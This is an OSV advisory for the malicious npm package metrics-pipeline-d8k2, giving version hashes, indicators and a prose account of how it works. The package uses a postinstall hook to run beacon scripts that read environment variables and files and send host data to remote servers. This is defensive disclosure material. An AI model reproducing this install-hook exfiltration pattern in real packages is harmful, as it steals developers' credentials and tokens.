MAL-2026-5858
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/metrics-pipeline-d8k2/MAL-2026-5858.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-5858
- Published
- 2026-06-16T01:34:34Z
- Modified
- 2026-06-16T02:31:45.555662768Z
- Summary
- Malicious code in metrics-pipeline-d8k2 (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (01ad2ee3d3807102a3f02c01af0d3fec46d91e9764eb77a8bcedf9c6be7fc3b0)
Package declares
"postinstall": "node run.js"in package.json, causing automatic execution of bundled beacon scripts onnpm install. beacon29.js loadschild_process,https, andfs, reads files viafs.readFileSyncand readsprocess.env, gathers host identity (process.platform), and POSTs/GETs the data to remote endpoints; it also referenceshttps://registry.npmjs.organdhttps://npm.pkg.github.com, consistent with credential/token harvesting and potential self-propagation through registry APIs. beacon_linux.js mirrors the pattern on Linux:require('child_process')+require('http')+os.hostname()+os.platform()followed byhttp.request(...)POST to a remote host. The package's stated 'metrics pipeline' name is a cover; the only behavior on install is host fingerprinting and outbound exfiltration. Installing this package on a developer or CI machine causes immediate compromise: environment variables (which commonly hold cloud and CI tokens), file contents, and host identifiers are sent to attacker-controlled infrastructure without user interaction. - Database specific
{ "malicious-packages-origins": [ { "id": "IN-MAL-2026-006723", "import_time": "2026-06-16T02:23:11.304743388Z", "source": "amazon-inspector", "versions": [ "1.0.3" ], "modified_time": "2026-06-16T01:34:35Z", "sha256": "01ad2ee3d3807102a3f02c01af0d3fec46d91e9764eb77a8bcedf9c6be7fc3b0" }, { "id": "IN-MAL-2026-006726", "import_time": "2026-06-16T02:23:11.46595368Z", "source": "amazon-inspector", "versions": [ "1.0.0" ], "sha256": "54c1af327fbf53a18b26a293093ff11b2ac19e346468fca66ff083166972dc7f", "modified_time": "2026-06-16T01:34:37Z" }, { "id": "IN-MAL-2026-006722", "import_time": "2026-06-16T02:23:11.229728398Z", "source": "amazon-inspector", "versions": [ "1.0.4" ], "sha256": "5b0d9377de514d01f4b2c4007ca1d7dfd5787ab72c185eb74a6f4f53ac1658ba", "modified_time": "2026-06-16T01:34:34Z" }, { "id": "IN-MAL-2026-006724", "import_time": "2026-06-16T02:23:11.354620754Z", "source": "amazon-inspector", "versions": [ "1.0.5" ], "modified_time": "2026-06-16T01:34:36Z", "sha256": "89a516af939e2a8520621d9ef7f847517da94269623a71aea9f2f00d3188a954" }, { "id": "IN-MAL-2026-006727", "import_time": "2026-06-16T02:23:11.559392458Z", "source": "amazon-inspector", "versions": [ "1.0.2" ], "modified_time": "2026-06-16T01:34:39Z", "sha256": "c113970b47b623dedfa59e8ff71bf20bfca793e1e1d9ff76b29eca1bf674dc9f" }, { "id": "IN-MAL-2026-006725", "import_time": "2026-06-16T02:23:11.40004171Z", "source": "amazon-inspector", "versions": [ "1.0.1" ], "modified_time": "2026-06-16T01:34:36Z", "sha256": "3a44ea64194cd8e1b678076116fadf8bc05e764bb8d478c72266cd0bf3874da4" } ] }- References
-
- https://www.npmjs.com/package/metrics-pipeline-d8k2/v/1.0.3
- https://www.npmjs.com/package/metrics-pipeline-d8k2/v/1.0.0
- https://www.npmjs.com/package/metrics-pipeline-d8k2/v/1.0.4
- https://www.npmjs.com/package/metrics-pipeline-d8k2/v/1.0.5
- https://www.npmjs.com/package/metrics-pipeline-d8k2/v/1.0.2
- https://www.npmjs.com/package/metrics-pipeline-d8k2/v/1.0.1
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / metrics-pipeline-d8k2
Package
- Name
- metrics-pipeline-d8k2
- View open source insights on deps.dev
- Purl
- pkg:npm/metrics-pipeline-d8k2
Database specific
cwes
[
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
},
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
}
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/metrics-pipeline-d8k2/MAL-2026-5858.json"
indicators
{
"package_integrity": [
{
"filename": "metrics-pipeline-d8k2-1.0.3.tgz",
"hashes": {
"sha1": "8a26aa479a56a8910b1f7bdef9744ebddfa41248",
"sha512_sri": "sha512-YsyQJQ4kak4OmsUnk47tUzCxFbyZMQ3TV6Tgu4kz3hk1TRUNTqk8h+LKtgyX8udgfzToUz2cPORZDIDu97kb/Q=="
}
}
],
"evidence_files": [
{
"path": "beacon29.js",
"sha256": "1ab07670374fe59d630d1eee53a64c3c4db7b3f9ea7090967041d9799bc35f7f",
"tlsh": "1a621971e8164da43a42d89dcb0bb4596026b21b3d60fd90b78d758c6fcd15f82728fe"
},
{
"path": "beacon_linux.js",
"sha256": "60a0fbee8014300d0dd230765cbea7b61e9660a1584ad6a265de71927ff04c68",
"tlsh": "5db1b7d6a57b41282bd3b89c679f84061823f217b512d8d0b6dc06248fc7924a1a2ded"
},
{
"path": "package.json",
"sha256": "e360fe53183307ea77dddf0f150015a3ee553dc9db54be3e70f8406c29ffcc51",
"tlsh": "77f09e589c302c335ac02e990ca19949b6744f1b60847d5e827b1d2801dfe7a30be15d"
}
]
}